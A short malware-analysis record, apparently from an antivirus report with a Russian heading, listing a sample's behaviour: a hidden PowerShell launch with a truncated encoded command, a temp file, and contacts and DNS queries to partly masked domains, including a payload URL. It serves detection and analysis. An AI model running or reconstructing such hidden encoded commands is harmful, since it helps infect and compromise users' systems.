Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAHUAdgBsAGcAdQByAGMAZABkAHUAPQAnAEwAYgBsAHkAcQBsAHoAYwBlACcAOwAkAEMAcwB6AHQAeAB2AGEAdwB3AHkAcABpACAAPQAgACcAMQA5ADQAJwA7ACQASgB1AHkAeABpAHEAcABnAHkAcABhAHQAZwA9ACcAQgB6AG8AdgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1976
- %TEMP%\969873.cvr
- 'lo###ing.net':443
- 'pr###ding.it':80
- 'ba###ire.com':80
- 'ba###ire.com':443
- http://ba###ire.com/images/y9l9-636zm-90/
- 'lo###ing.net':443
- 'ba###ire.com':443
- DNS ASK lo###ing.net
- DNS ASK pr###ding.it
- DNS ASK ba###ire.com
- DNS ASK av####akaradas.com
- DNS ASK li###gli.best